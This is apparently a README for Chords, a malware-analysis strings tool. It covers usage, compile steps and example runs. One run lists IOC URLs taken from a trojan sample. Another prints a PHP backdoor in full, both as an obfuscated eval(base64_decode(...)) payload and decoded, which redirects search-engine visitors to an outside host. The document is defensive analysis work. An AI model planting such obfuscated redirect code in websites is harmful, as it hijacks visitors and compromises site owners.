☣ Chords Malware Analyzer ☣

Chords is a malware analysis tool similar to the traditional "strings" tool, but with some advanced additions.

The tool is able to extract strings from files just like strings, but it also supports windows wide string, base64 and hexadecimal strings (with decoding support) and automatic recognition of Indicators of Compromise (IOCs).

It has been developed to support the malware analysis process, but is a general purpose tool.

  • Chords: strings on steroids!

Basic features

Just like strings, sequence of ascii characters are extracted from binary files if they longer or equals to the specified length.

Unlike strings, also wide character sequences, used by Windows binaries, are extracted.

Decoding

Some common encoding formats are detected and decoded:

  • Base64 strings
  • Hexadecimal encoded strings
  • Decimal encoded strings

These formats have been selected since they are commonly used by malware delevopers to obfuscate the behaviour of the samples.

IOC extraction

To immediately extract useful informations about the behaviour of a sample, the tool automatically detects the following indicators of compromise:

  • IPv4 addresses
  • DNS Domains
  • URLs
  • User-Agent strings
  • Emails
  • PDB strings

More IOC will be supported in the future.

Usage

Chords works on binary files to extract strings and other relevant data.

See the usage of the tool:

[emanueleacri]$ chords -h
Chords - strings and wide-strings extraction utility.

Usage: chords [options] filename [filenames ...]

Available options:
  -h, --help               print this help text
  -i, --noiocs             do not search for IOCs
  -b, --base64             decode base64 strings
  -x, --hex                decode hex strings
  -d, --dec                decode decimal strings
  -l, --length NUM         minimum length for strings (default 4)
  -n, --nobreak            do not break on newlines characters
  -s, --nosort             do not sort strings
  -u, --nounique           do not remove duplicates from strings (need sorted mode)

Try to run the tool against binary files or malware samples.

Compile

The tool is written in Common Lisp, and compiled with SBCL.

You need to have a working SBCL (http://www.sbcl.org/) distribution and the quicklisp (https://www.quicklisp.org/)) module installed.

In the source it is assumed that a file quicklisp.lsp is present in your home directory.

When you have the prerequisites ready just execute:

/usr/bin/sbcl --script chords.lsp

To produce a chords binary for your system and architecture.

Is you do not like to compile the tool, you can download one of several precompiled binaries for the major operating systems and architectures.

Examples

Some analysis against common malware samples. All the malicious binaries are downloaded from public sources. Be careful!

IOCs extraction:
W32.SapinH.Trojan (hash 48a2a83f1260eacfb845b8c989eb8b0c63da63f5d26bc8d1f432f81f9a9f8da1).

[examples]$ chords 48a2a83f1260eacfb845b8c989eb8b0c63da63f5d26bc8d1f432f81f9a9f8da1

[... EXTRACTED STRINGS ...]
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.

 ====== IOCs ======

www.hao123.com
http://www.qq5.com/
http://www.go2000.com/
http://d1.kuai8.com/setup/kuai8_rjaz.exe
http://down.360safe.com/p/360Inst_oemwwq.exe
http://www.hao123.com/?tn=02023048_25_hao_pg
http://www.hao123.com/?tn=82013038_13_hao_pg
http://www.hao123.com/?tn=82013038_32_hao_pg
http://www.hao123.com/?tn=29065018_47_hao_pg
http://www.hao123.com/?tn=29065018_45_hao_pg
http://www.hao123.com/?tn=29065018_46_hao_pg
http://www.hao123.com/?tn=29065018_48_hao_pg
http://dl.client.baidu.com/union/getbdbrowser.php?tn=29065018_115.exe

String Decoding:
Custom Test PHP Backdoor (hash edd55197617ec01462906c3d9d02105703d2b291fab414585722f8995967fc99).

[chords-web]$ chords -i -b custom_test_php_backdoor.txt 
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));

 ====== BASE64 ======

DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9
..error_reporting(0);..$qazplm=headers_sent();..if (!$qazplm){..$referer=$_SERVER['HTTP_REFERER'];..$uag=$_SERVER['HTTP_USER_AGENT'];..if ($uag) {..if (!stristr($uag,"MSIE 7.0")){.if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {..if (!stristr($referer,"cache") or !stristr($referer,"inurl")){..header("Location: http://gigop.americanunfinished.com/");..exit();..}.}.}..}..}

Enjoy!